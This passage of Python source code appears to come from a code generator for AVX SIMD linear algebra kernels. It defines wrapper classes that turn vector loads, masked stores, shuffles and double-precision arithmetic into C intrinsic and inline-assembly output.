es = [ mm256MaskloadPs(Pointer((pointer.mat, (pointer.at[0] + i, pointer.at[1]))), vmask) for i in range(l) ]
if l == 2:
content = mm256UnpackloPs(es[0], es[1])
elif l==3:
t0 = mm256UnpackloPs(es[0], es[1])
content = mm256ShufflePs(t0, es[2], (1,0,1,0))
elif l==4:
t0 = mm256UnpackloPs(es[0], es[1])
t1 = mm256UnpackloPs(es[2], es[3])
content = mm256ShufflePs(t0, t1, (1,0,1,0))
elif l==5:
t0 = mm256UnpackloPs(es[0], es[1])
t1 = mm256UnpackloPs(es[2], es[3])
t2 = mm256ShufflePs(t0, t1, (1,0,1,0))
content = mm256Permute2f128Ps(t2, es[4], [0,0,1,0,0,0,0,0])
elif l==6:
t0 = mm256UnpackloPs(es[0], es[1])
t1 = mm256UnpackloPs(es[2], es[3])
t2 = mm256ShufflePs(t0, t1, (1,0,1,0))
t3 = mm256UnpackloPs(es[4], es[5])
content = mm256Permute2f128Ps(t2, t3, [0,0,1,0,0,0,0,0])
elif l==7:
t0 = mm256UnpackloPs(es[0], es[1])
t1 = mm256UnpackloPs(es[2], es[3])
t2 = mm256ShufflePs(t0, t1, (1,0,1,0))
t3 = mm256UnpackloPs(es[4], es[5])
t4 = mm256ShufflePs(t3, es[6], (1,0,1,0))
content = mm256Permute2f128Ps(t2, t4, [0,0,1,0,0,0,0,0])
elif l==8:
t0 = mm256UnpackloPs(es[0], es[1])
t1 = mm256UnpackloPs(es[2], es[3])
t2 = mm256ShufflePs(t0, t1, (1,0,1,0))
t3 = mm256UnpackloPs(es[4], es[5])
t4 = mm256UnpackloPs(es[6], es[7])
t5 = mm256ShufflePs(t3, t4, (1,0,1,0))
content = mm256Permute2f128Ps(t2, t5, [0,0,1,0,0,0,0,0])
elif any(map(lambda rng: mrmap == rng, [range(i,j+1) for i in range(self.reglen) for j in range(self.reglen) if i<j ])):
vmask = self.reglen*[0]
for i in mrmap:
vmask[i] = 1
content = mm256MaskloadPs(Pointer((pointer.mat, (pointer.at[0], pointer.at[1] - mrmap[0]))), vmask, zeromask)
if content is None:
raise ValueError('mm256LoadGs does not support mrmap %s with %s layout yet' % (str(mrmap), 'horizontal' if horizontal else 'vertical'))
return content
def computeSym(self, nameList):
return self.content.computeSym(self, nameList)
def getZMask(self):
return self.content.getZMask()
def unparse(self, indent):
content = self.content
res = content.unparse(indent)
# res += "\n" + DebugPrint(["\""+getReference(icode, self.pointer.mat).physLayout.name+"\"", "\" [ \"", str(self.pointer.at[0]), "\" , \"", str(self.pointer.at[1]), "\" ] at line \"", "__LINE__"]).unparse(indent);
# if self.analysis is not None and isinstance(self.analysis, IntervalCongruenceReductionAnalysis):
# content.env = self.env
# self.analysis.propagateEnvToSrcs(content)
# content = content.align(self.analysis)
return res
def setIterSet(self, indices, iterSet):
super(mm256LoadGs, self).setIterSet(indices, iterSet)
self.setSpaceReadMap(indices, iterSet)
def printInst(self, indent):
# return 'mmLoadGs(%s, %s, %s)' % (str(self.mrmap), self.orientation, self.content.printInst(indent))
return 'mm256LoadGs(%r, %r, %s)' % (self.pointer, self.mrmap, self.orientation)
def align(self, analysis):
self.analysis = analysis
return self
def __eq__(self, other):
return isinstance(other, VecAccess) and self.reglen == other.reglen and self.pointer == other.pointer and self.mrmap == other.mrmap and (self.horizontal == other.horizontal or self.isCompact and other.isCompact)
def __hash__(self):
return hash((hash('mm256LoadGs'), self.pointer.mat, self.pointer.at, str(self.mrmap), self.orientation))
class mm256StoreGs(MovStatement):
'''Wrapper of a vector store instruction.
Useful when we want to represent a composite store instruction as a single logical instruction and then have it
easily replaced by a scalar during scalar replacement.
'''
def __init__(self, src, dst, mrmap, isCompact=True, isCorner=False, horizontal=True):
super(mm256StoreGs, self).__init__()
self.srcs += [src]
self.mrmap = mrmap
dstptr = dst if isinstance(dst, Pointer) else dst.pointer
self.dst = VecDest(dstptr, 8, mrmap, horizontal, isCompact, isCorner)
self.horizontal = horizontal
self.isCompact = isCompact
self.isCorner = isCorner
self.orientation = 'horizontal' if horizontal else 'vertical'
self.reglen = 8
self.analysis = None
self._content = None
@property
def content(self):
if self._content is None:
self._content = self.generateContent()
return self._content
def generateContent(self):
dst = self.dst.pointer
src = self.srcs[0]
mrmap = self.mrmap
horizontal = self.horizontal
isCompact = self.isCompact
content = None
if len(mrmap) == 1:
vmask = 8*[0]
vmask[mrmap[0]] = 1
content = [mm256MaskstorePs(vmask, src, dst)]
elif mrmap == range(len(mrmap)):
l = len(mrmap)
if isCompact or horizontal:
if l == self.reglen:
content = [mm256StoreuPs(src, dst)]
else:
vmask = self.reglen*[0]
vmask[:l] = l*[1]
content = [mm256MaskstorePs(vmask, src, dst)]
else: # Incompact case should appear only if vertical
content = []
vmask = [1] + 7*[0]
pcs = [ Pointer((dst.mat, (dst.at[0] + i, dst.at[1]))) for i in range(l) ]
if l == 2:
content.append( mm256MaskstorePs(vmask, src, pcs[0]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, src, (2,2,2,1)), pcs[1]) )
elif l==3:
content.append( mm256MaskstorePs(vmask, src, pcs[0]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, src, (3,3,3,1)), pcs[1]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, src, (3,3,3,2)), pcs[2]) )
elif l==4:
content.append( mm256MaskstorePs(vmask, src, pcs[0]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
elif l==5:
content.append( mm256MaskstorePs(vmask, src, pcs[0]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
lane1 = mm256Permute2f128Ps(src, src, [1,0,0,0,0,0,0,1])
content.append( mm256MaskstorePs(vmask, lane1, pcs[4]) )
elif l==6:
content.append( mm256MaskstorePs(vmask, src, pcs[0]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
lane1 = mm256Permute2f128Ps(src, src, [1,0,0,0,0,0,0,1])
content.append( mm256MaskstorePs(vmask, lane1, pcs[4]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, lane1, (2,2,2,1)), pcs[5]) )
elif l==7:
content.append( mm256MaskstorePs(vmask, src, pcs[0]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
lane1 = mm256Permute2f128Ps(src, src, [1,0,0,0,0,0,0,1])
content.append( mm256MaskstorePs(vmask, lane1, pcs[4]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, lane1, (3,3,3,1)), pcs[5]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, lane1, (3,3,3,2)), pcs[6]) )
elif l==8:
content.append( mm256MaskstorePs(vmask, src, pcs[0]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(src, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
lane1 = mm256Permute2f128Ps(src, src, [1,0,0,0,0,0,0,1])
content.append( mm256MaskstorePs(vmask, lane1, pcs[4]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, mm256SetzeroPs(), (0,0,0,1)), pcs[5]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, mm256SetzeroPs(), (0,0,0,2)), pcs[6]) )
content.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, mm256SetzeroPs(), (0,0,0,3)), pcs[7]) )
if content is None:
raise ValueError('mm256StoreGs does not support mrmap %s with %s layout yet' % (str(mrmap), 'horizontal' if horizontal else 'vertical'))
return content
def replaceRefs(self, refMap):
dst = self.dst.replaceRefs(refMap)
src = self.srcs[0].replaceRefs(refMap)
if isinstance(dst, VecDest):
self.dst = dst
self.srcs[0] = src
return self
return Mov(src, dst)
@staticmethod
def canStore(reglen, mrmap, horizontal, isAligned=False):
return reglen == 8
@staticmethod
def getStore(src, dst):
mrmap = dst.mrmap
if isinstance(mrmap, int):
mrmap = [mrmap]
return mm256StoreGs(src, dst, mrmap, dst.isCompact, dst.isCorner, dst.horizontal)
def computeSym(self, nameList):
return self.srcs[0].computeSym(nameList)[:len(self.mrmap)]
def unparse(self, indent):
content = self.content
# if self.analysis is not None and isinstance(self.analysis, IntervalCongruenceReductionAnalysis):
# for instr in content:
# instr.env = self.env
# self.analysis.propagateEnvToSrcs(instr)
# content = [instr.align(self.analysis) for instr in content]
return '\n'.join(instr.unparse(indent) for instr in content)
def printInst(self, indent):
# return 'mmStoreGs(%s, %s, %s)' % (str(self.mrmap), self.orientation, ','.join([instr.printInst(indent) for instr in self._content]))
return 'mm256StoreGs(%r, %r, %r, %s)' % (self.dst, self.srcs[0], self.mrmap, self.orientation)
def align(self, analysis):
self.analysis = analysis
return self
class mm256LoadGd(RValue, VecAccess):
''' Wrapper of a vector load instruction.
Useful when we want to represent a composite load instruction as a single logical instruction and then have it
easily replaced by a scalar during scalar replacement.
'''
def __init__(self, pointer, mrmap, isCompact=True, isCorner=False, horizontal=True, zeromask=None, not_using_mask=None):
super(mm256LoadGd, self).__init__()
self.pointer = pointer
self.mrmap = mrmap
self.isCompact = isCompact
self.isCorner = isCorner
self.horizontal = horizontal
self.orientation = 'horizontal' if horizontal else 'vertical'
self.zeromask = [] if zeromask is None else zeromask
self.not_using_mask = [False]*len(mrmap) if not_using_mask is None else not_using_mask
self.reglen = 4
self.analysis = None
self._content = None
@property
def content(self):
if self._content == None:
self._content = self.generateContent()
return self._content
def generateContent(self):
mrmap = self.mrmap
pointer = self.pointer
zeromask = self.zeromask
horizontal = self.horizontal
isCompact = self.isCompact
content = None
if len(mrmap) == 1:
if mrmap == [tuple(range(self.reglen))]:
content = mm256BroadcastSd(pointer, zeromask)
elif mrmap[0] == 0:
content = mm256CastPd128Pd256(mmLoadSd(pointer))
else:
vmask = self.reglen*[0]
vmask[mrmap[0]] = 1
maskPtr = pointer if isinstance(pointer.ref, ScalarsReference) else Pointer((pointer.mat, (pointer.at[0], pointer.at[1] - mrmap[0])))
content = mm256MaskloadPd(maskPtr, vmask, zeromask)
elif mrmap == range(len(mrmap)):
l = len(mrmap)
if isCompact or horizontal:
if l == self.reglen:
content = mm256LoaduPd(pointer, zeromask)
# content = asm256LoaduPd(pointer, zeromask)
else:
vmask = self.reglen*[0]
vmask[:l] = l*[1]
content = mm256MaskloadPd(pointer, vmask, zeromask)
else: # Incompact case should appear only if vertical
# vmask = [1] + 3*[0]
# es = [ mm256MaskloadPd(Pointer((pointer.mat, (pointer.at[0] + i, pointer.at[1]))), vmask) for i in range(l) ]
es = [ mm256CastPd128Pd256(mmLoadSd(Pointer((pointer.mat, (pointer.at[0] + i, pointer.at[1]))))) for i in range(l) ]
if l == 2:
content = mm256ShufflePd(es[0], es[1], [0,0,0,0])
elif l==3:
content = mm256Permute2f128Pd(mm256UnpackloPd(es[0], es[1]), es[2], [0,0,1,0,0,0,0,0])
elif l==4:
content = mm256Permute2f128Pd(mm256UnpackloPd(es[0], es[1]), mm256UnpackloPd(es[2], es[3]), (0,0,1,0,0,0,0,0))
elif any(map(lambda rng: mrmap == rng, [range(i,j+1) for i in range(self.reglen) for j in range(self.reglen) if i<j ])):
vmask = self.reglen*[0]
for i in mrmap:
vmask[i] = 1
content = mm256MaskloadPd(Pointer((pointer.mat, (pointer.at[0], pointer.at[1] - mrmap[0]))), vmask, zeromask)
if content is None:
raise ValueError('mm256LoadGd does not support mrmap %s with %s layout yet' % (str(mrmap), 'horizontal' if horizontal else 'vertical'))
return content
def computeSym(self, nameList):
return self.content.computeSym(self, nameList)
def getZMask(self):
return self.content.getZMask()
def unparse(self, indent):
content = self.content
# if self.analysis is not None and isinstance(self.analysis, IntervalCongruenceReductionAnalysis):
# content.env = self.env
# self.analysis.propagateEnvToSrcs(content)
# content = content.align(self.analysis)
return content.unparse(indent)
def setIterSet(self, indices, iterSet):
super(mm256LoadGd, self).setIterSet(indices, iterSet)
self.setSpaceReadMap(indices, iterSet)
def printInst(self, indent):
# return 'mmLoadGs(%s, %s, %s)' % (str(self.mrmap), self.orientation, self.content.printInst(indent))
return 'mm256LoadGd(%r, %r, %r, %s, isCompact=%s)' % (self.pointer, self.mrmap, self.not_using_mask, self.orientation, str(self.isCompact))
def align(self, analysis):
self.analysis = analysis
return self
def __eq__(self, other):
return isinstance(other, VecAccess) and self.reglen == other.reglen and self.pointer == other.pointer and self.mrmap == other.mrmap and (self.horizontal == other.horizontal or self.isCompact and other.isCompact)
def __hash__(self):
return hash((hash('mm256LoadGd'), self.pointer.mat, self.pointer.at, str(self.mrmap), self.orientation, self.isCompact))
class mm256StoreGd(MovStatement):
'''Wrapper of a vector store instruction.
Useful when we want to represent a composite store instruction as a single logical instruction and then have it
easily replaced by a scalar during scalar replacement.
'''
def __init__(self, src, dst, mrmap, isCompact=True, isCorner=False, horizontal=True):
super(mm256StoreGd, self).__init__()
self.srcs += [src]
self.mrmap = mrmap
dstptr = dst if isinstance(dst, Pointer) else dst.pointer
self.dst = VecDest(dstptr, 4, mrmap, horizontal, isCompact, isCorner)
self.horizontal = horizontal
self.isCompact = isCompact
self.isCorner = isCorner
self.orientation = 'horizontal' if horizontal else 'vertical'
self.reglen = 4
self.analysis = None
self._content = None
@property
def content(self):
if self._content is None:
self._content = self.generateContent()
return self._content
def generateContent(self):
dst = self.dst.pointer
src = self.srcs[0]
mrmap = self.mrmap
horizontal = self.horizontal
isCompact = self.isCompact
content = None
if len(mrmap) == 1:
if mrmap[0] == 0:
content = [ mmStoreSd(mm256CastPd256Pd128(src), dst) ]
else:
vmask = self.reglen*[0]
vmask[mrmap[0]] = 1
content = [mm256MaskstorePd(vmask, src, Pointer((dst.mat, (dst.at[0], dst.at[1]-mrmap[0]))))]
elif mrmap == range(len(mrmap)):
l = len(mrmap)
if isCompact or horizontal:
if l == self.reglen:
content = [mm256StoreuPd(src, dst)]
# content = [asm256StoreuPd(src, dst)]
else:
vmask = self.reglen*[0]
vmask[:l] = l*[1]
content = [mm256MaskstorePd(vmask, src, dst)]
else: # Incompact case should appear only if vertical
content = []
vmask = [1] + 3*[0]
pcs = [ Pointer((dst.mat, (dst.at[0] + i, dst.at[1]))) for i in range(l) ]
if l == 2:
content.append( mm256MaskstorePd(vmask, src, pcs[0]) )
content.append( mm256MaskstorePd(vmask, mm256ShufflePd(src, src, [0,0,0,1]), pcs[1]) )
elif l==3:
content.append( mm256MaskstorePd(vmask, src, pcs[0]) )
content.append( mm256MaskstorePd(vmask, mm256ShufflePd(src, src, [0,0,0,1]), pcs[1]) )
content.append( mm256MaskstorePd(vmask, mm256Permute2f128Pd(src, src, [1,0,0,0,0,0,0,1]), pcs[2]) )
elif l==4:
content.append( mm256MaskstorePd(vmask, src, pcs[0]) )
content.append( mm256MaskstorePd(vmask, mm256ShufflePd(src, src, [0,0,0,1]), pcs[1]) )
invlane = mm256Permute2f128Pd(src, src, [1,0,0,0,0,0,0,1])
content.append( mm256MaskstorePd(vmask, invlane, pcs[2]) )
content.append( mm256MaskstorePd(vmask, mm256ShufflePd(invlane, invlane, [0,0,0,1]), pcs[3]) )
elif any(map(lambda rng: mrmap == rng, [range(i,j+1) for i in range(self.reglen) for j in range(self.reglen) if i<j ])):
vmask = self.reglen*[0]
for i in mrmap:
vmask[i] = 1
content = [mm256MaskstorePd(vmask, src, Pointer((dst.mat, (dst.at[0], dst.at[1]-mrmap[0]))))]
# elif mrmap == [1, 2]:
# if horizontal or isCompact:
# v1_2 = mmShufflePs(src, src, (3,3,2,1))
# content = [mmStorelPi(v1_2, PointerCast("__m64", dst))]
# elif mrmap == [2, 3]:
# if horizontal or isCompact:
# content = [mmStorehPi(src, PointerCast("__m64", dst))]
# elif mrmap == [1, 2, 3]:
# if horizontal or isCompact:
# pointer2 = Pointer((dst.mat, (dst.at[0], dst.at[1] + 1)))
# e1 = mmShufflePs(src, src, (1,1,1,1))
# content = [mmStoreSsNoZeromask(e1, dst), mmStorehPi(src, PointerCast("__m64", pointer2))]
if content is None:
raise ValueError('mm256StoreGd does not support mrmap %s with %s layout yet' % (str(mrmap), 'horizontal' if horizontal else 'vertical'))
# #DEBUG
# pi,pj=0,0
# for _ in range(len(mrmap)):
# content.append(DebugPrint(["\"Storing "+getReference(icode, dst.mat).physLayout.name+"\"", "\" [ \"", str(dst.at[0]+pi), "\" , \"", str(dst.at[1]+pj), "\" ] at line \"", "__LINE__"]));
# if horizontal:
# pj += 1
# else:
# pi += 1
# #DEBUG
return content
def replaceRefs(self, refMap):
dst = self.dst.replaceRefs(refMap)
src = self.srcs[0].replaceRefs(refMap)
if isinstance(dst, VecDest):
self.dst = dst
self.srcs[0] = src
return self
return Mov(src, dst)
@staticmethod
def canStore(reglen, mrmap, horizontal, isAligned=False):
return reglen == 4
@staticmethod
def getStore(src, dst):
mrmap = dst.mrmap
if isinstance(mrmap, int):
mrmap = [mrmap]
return mm256StoreGd(src, dst, mrmap, dst.isCompact, dst.isCorner, dst.horizontal)
def computeSym(self, nameList):
return self.srcs[0].computeSym(nameList)[:len(self.mrmap)]
def unparse(self, indent):
content = self.content
# if self.analysis is not None and isinstance(self.analysis, IntervalCongruenceReductionAnalysis):
# for instr in content:
# instr.env = self.env
# self.analysis.propagateEnvToSrcs(instr)
# content = [instr.align(self.analysis) for instr in content]
return '\n'.join(instr.unparse(indent) for instr in content)
def printInst(self, indent):
# return 'mmStoreGs(%s, %s, %s)' % (str(self.mrmap), self.orientation, ','.join([instr.printInst(indent) for instr in self._content]))
return 'mm256StoreGd(%r, %r, %r, %s, isCompact=%s)' % (self.dst, self.srcs[0], self.mrmap, self.orientation, str(self.isCompact))
def align(self, analysis):
self.analysis = analysis
return self
class mm256LoaduPd(RValue, VecAccess):
def __init__(self, pointer, zeromask=None):
super(mm256LoaduPd, self).__init__()
self.reglen = 4
self.mrmap = [0,1,2,3]
self.zeromask = [0]*self.reglen
if zeromask is not None:
for pos in zeromask:
self.zeromask[pos] = 1
self.pointer = pointer
def computeSym(self, nameList):
p = self.pointer.computeSym(nameList)
return [ sympify(p+'_0'), sympify(p+'_1'), sympify(p+'_2'), sympify(p+'_3') ]
def getZMask(self):
return self.zeromask
def unparse(self, indent):
return indent + "_mm256_loadu_pd(" + self.pointer.unparse("") + ")"
def printInst(self, indent):
return indent + "mm256LoaduPd( " + self.pointer.printInst("") + " )"
def __eq__(self, other):
return isinstance(other, mm256LoaduPd) and self.pointer == other.pointer
def __hash__(self):
return hash((hash("mm256LoaduPd"), self.pointer.mat, self.pointer.at))
class asm256LoaduPd(mm256LoaduPd):
def __init__(self, pointer, zeromask=None):
super(asm256LoaduPd, self).__init__(pointer, zeromask)
def unparse(self, indent):
return indent + "_asm256_loadu_pd(" + self.pointer.unparse("") + ")"
def printInst(self, indent):
return indent + "asm256LoaduPd( " + self.pointer.printInst("") + " )"
@staticmethod
def add_func_defs():
f = "static __inline__ __m256d _asm256_loadu_pd(const double* p) {\n"
f += " __m256d v;\n"
f += " __asm__(\"vmovupd %1, %0\" : \"=x\" (v) : \"m\" (*p));\n"
f += " return v;\n}\n"
return [f]
class mm256MaskloadPd(RValue, VecAccess):
def __init__(self, pointer, vecmask, zeromask=None):
super(mm256MaskloadPd, self).__init__()
self.reglen = 4
self.mrmap = []
self.zeromask = []
for m,i in zip(vecmask,range(4)):
self.mrmap += [i] if m else [-1]
self.zeromask += [0] if m else [1]
if zeromask is not None:
for pos in zeromask: # there should at most be 1 pos == 0 here
self.zeromask[pos] = 1
self.pointer = pointer
self.vecmask = vecmask
def computeSym(self, nameList):
p = self.pointer.computeSym(nameList)
res = []
for m,i in zip(self.vecmask,range(4)):
res += [sympify(p+'_'+str(i))] if m else [sympify(0)]
return res
def getZMask(self):
return self.zeromask
def unparse(self, indent):
vm = "_mm256_setr_epi64x("
for m,i in zip(self.vecmask,range(4)):
vm += "(__int64)1 << 63" if m else "0"
vm += ", " if i<3 else ")"
return indent + "_mm256_maskload_pd(" + self.pointer.unparse("") + ", " + vm + ")"
def printInst(self, indent):
return indent + "mm256MaskloadPd( " + self.pointer.printInst("") + ", " + str(self.vecmask) + ")"
def __eq__(self, other):
return isinstance(other, mm256MaskloadPd) and self.vecmask == other.vecmask and self.pointer == other.pointer
def __hash__(self):
return hash((hash("mm256MaskloadPd"), hash(tuple(self.vecmask)), self.pointer.mat, self.pointer.at))
class mm256BroadcastSd(RValue, VecAccess):
def __init__(self, pointer, zeromask=None):
super(mm256BroadcastSd, self).__init__()
self.reglen = 4
self.mrmap = [(0,1,2,3)]
self.zeromask = [0]*self.reglen
if zeromask is not None: # In this case all the positions have to be zero
self.zeromask = [1]*self.reglen
self.pointer = pointer
def computeSym(self, nameList):
p = self.pointer.computeSym(nameList)
return [ sympify(p+'_0'), sympify(p+'_0'), sympify(p+'_0'), sympify(p+'_0') ]
def getZMask(self):
return self.zeromask
def unparse(self, indent):
return indent + "_mm256_broadcast_sd(" + self.pointer.unparse("") + ")"
def printInst(self, indent):
return indent + "mm256BroadcastSd( " + self.pointer.printInst("") + " )"
def __eq__(self, other):
return isinstance(other, mm256BroadcastSd) and self.pointer == other.pointer
def __hash__(self):
return hash((hash("mm256BroadcastSd"), self.pointer.mat, self.pointer.at))
class mm256StoreuPd(MovStatement):
mrmap = [0,1,2,3] # static definition of the mem-reg mapping imposed by the store
def __init__(self, src, dst):
super(mm256StoreuPd, self).__init__()
self.dst = VecDest(dst, 4, self.mrmap) if isinstance(dst, Pointer) else VecDest(dst.pointer, 4, self.mrmap)
self.srcs += [ src ]
# self.slen = 4
# self.dlen = 4
def replaceRefs(self, refMap):
dst = self.dst.replaceRefs(refMap)
src = self.srcs[0].replaceRefs(refMap)
if isinstance(dst, VecDest):
self.dst = dst
self.srcs[0] = src
return self
return Mov(src, dst)
@staticmethod
def canStore(reglen, mrmap, horizontal=True, isAligned=False):
if not horizontal: return False
return reglen == 4 and mrmap == mm256StoreuPd.mrmap
@staticmethod
def getStore(src, dst):
return mm256StoreuPd(src, dst)
def computeSym(self, nameList):
return self.srcs[0].computeSym(nameList)
def unparse(self, indent):
return indent + "_mm256_storeu_pd(" + self.dst.unparse("") + ", " + self.srcs[0].unparse("") + ");"
def printInst(self, indent):
return indent + "mm256StoreuPd( " + self.srcs[0].printInst("") + ", " + self.dst.printInst("") + " )"
class asm256StoreuPd(mm256StoreuPd):
def __init__(self, src, dst):
super(asm256StoreuPd, self).__init__(src, dst)
def unparse(self, indent):
return indent + "_asm256_storeu_pd(" + self.dst.unparse("") + ", " + self.srcs[0].unparse("") + ");"
def printInst(self, indent):
return indent + "asm256StoreuPd( " + self.srcs[0].printInst("") + ", " + self.dst.printInst("") + " )"
@staticmethod
def add_func_defs():
f = "static __inline__ void _asm256_storeu_pd(double* p, const __m256d& v) {\n"
f += " __asm__(\"vmovupd %1, %0\" : \"=rm\" (*p) : \"x\" (v));\n}\n"
return [f]
class mm256MaskstorePd(MovStatement):
def __init__(self, vecmask, src, dst):
super(mm256MaskstorePd, self).__init__()
self.mrmap = []
for m,i in zip(vecmask,range(4)):
self.mrmap += [i] if m else [-1]
self.dst = VecDest(dst, 4, self.mrmap) if isinstance(dst, Pointer) else VecDest(dst.pointer, 4, self.mrmap)
self.srcs += [ src ]
self.vecmask = vecmask
@staticmethod
def canStore(reglen, mrmap, horizontal=True, isAligned=False):
if not horizontal: return False
itcan = True
for m,i in zip(mrmap,range(4)):
itcan = itcan and (m == i or m == -1)
return reglen == 4 and itcan
@staticmethod
def getStore(src, dst):
vecmask = [ (0 if r == -1 else 1) for r in dst.mrmap ]
vecmask.extend([0 for _ in range(len(dst.mrmap), 4)])
return mm256MaskstorePd(vecmask, src, dst)
def replaceRefs(self, refMap):
dst = self.dst.replaceRefs(refMap)
src = self.srcs[0].replaceRefs(refMap)
if isinstance(dst, VecDest):
self.dst = dst
self.srcs[0] = src
return self
return Mov(src, dst)
def computeSym(self, nameList):
src = self.srcs[0].computeSym(nameList)
res = []
for m,i in zip(self.vecmask,range(4)):
res += [src[i]] if m else ["-"]
return res
def unparse(self, indent):
vm = "_mm256_setr_epi64x("
for m,i in zip(self.vecmask,range(4)):
vm += "(__int64)1 << 63" if m else "0"
vm += ", " if i<3 else ")"
return indent + "_mm256_maskstore_pd(" + self.dst.unparse("") + ", " + vm + ", " + self.srcs[0].unparse("") + ");"
def printInst(self, indent):
return indent + "mm256MaskstorePd( " + str(self.vecmask) + ", " + self.srcs[0].printInst("") + ", " + self.dst.printInst("") + " )"
class mm256Set1Pd(RValue):
def __init__(self, src):
super(mm256Set1Pd, self).__init__()
self.srcs += [ src ]
def computeSym(self, nameList):
sym = self.srcs[0].computeSym(nameList)[0]
return [ sym, sym, sym, sym ]
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
return [ s0ZMask[0], s0ZMask[0], s0ZMask[0], s0ZMask[0] ]
def unparse(self, indent):
return indent + "_mm256_set1_pd(" + self.srcs[0].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256Set1Pd( " + self.srcs[0].printInst("") + " )"
class mm256SetPd(RValue):
def __init__(self, src0, src1, src2, src3):
super(mm256SetPd, self).__init__()
self.srcs += [ src0, src1, src2, src3 ]
def computeSym(self, nameList):
return [ self.srcs[3].computeSym(nameList)[0], self.srcs[2].computeSym(nameList)[0], self.srcs[1].computeSym(nameList)[0], self.srcs[0].computeSym(nameList)[0] ]
def getZMask(self):
s0ZMask = self.srcs[0].getZMask()
s1ZMask = self.srcs[1].getZMask()
s2ZMask = self.srcs[2].getZMask()
s3ZMask = self.srcs[3].getZMask()
return [ s3ZMask[0], s2ZMask[0], s1ZMask[0], s0ZMask[0] ]
def unparse(self, indent):
return indent + "_mm256_set_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ", " + self.srcs[2].unparse("") + ", " + self.srcs[3].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256SetPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + self.srcs[2].printInst("") + ", " + self.srcs[3].printInst("") + " )"
class mm256CastPd128Pd256(RValue):
def __init__(self, src):
super(mm256CastPd128Pd256, self).__init__()
self.srcs += [ src ]
def computeSym(self, nameList):
src = self.srcs[0].computeSym(nameList)
x = sympify('x') # Unknown
return [ src[0], src[1], x, x ]
def unparse(self, indent):
return indent + "_mm256_castpd128_pd256(" + self.srcs[0].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256CastPd128Pd256( " + self.srcs[0].printInst("") + " )"
class mm256CastPd256Pd128(RValue):
def __init__(self, src):
super(mm256CastPd256Pd128, self).__init__()
self.srcs += [ src ]
def computeSym(self, nameList):
src = self.srcs[0].computeSym(nameList)
return [ src[0], src[1] ]
def unparse(self, indent):
return indent + "_mm256_castpd256_pd128(" + self.srcs[0].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256CastPd256Pd128( " + self.srcs[0].printInst("") + " )"
class mm256AddPd(RValue):
def __init__(self, src0, src1):
super(mm256AddPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[0] + src1[0], src0[1] + src1[1], src0[2] + src1[2], src0[3] + src1[3] ]
def unparse(self, indent):
return indent + "_mm256_add_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256AddPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256SubPd(RValue):
def __init__(self, src0, src1):
super(mm256SubPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[0] - src1[0], src0[1] - src1[1], src0[2] - src1[2], src0[3] - src1[3] ]
def unparse(self, indent):
return indent + "_mm256_sub_pd(" + self.srcs[0].unparse("") + ", " + self.srcs[1].unparse("") + ")"
def printInst(self, indent):
return indent + "mm256SubPd( " + self.srcs[0].printInst("") + ", " + self.srcs[1].printInst("") + " )"
class mm256MulPd(RValue):
def __init__(self, src0, src1):
super(mm256MulPd, self).__init__()
self.srcs += [ src0, src1 ]
def computeSym(self, nameList):
src0 = self.srcs[0].computeSym(nameList)
src1 = self.srcs[1].computeSym(nameList)
return [ src0[0] * src1[0], src0[1] * src1[1], src0[2] * src1[2], src0[3] * src1[3] ]
def unparse(self, indent):
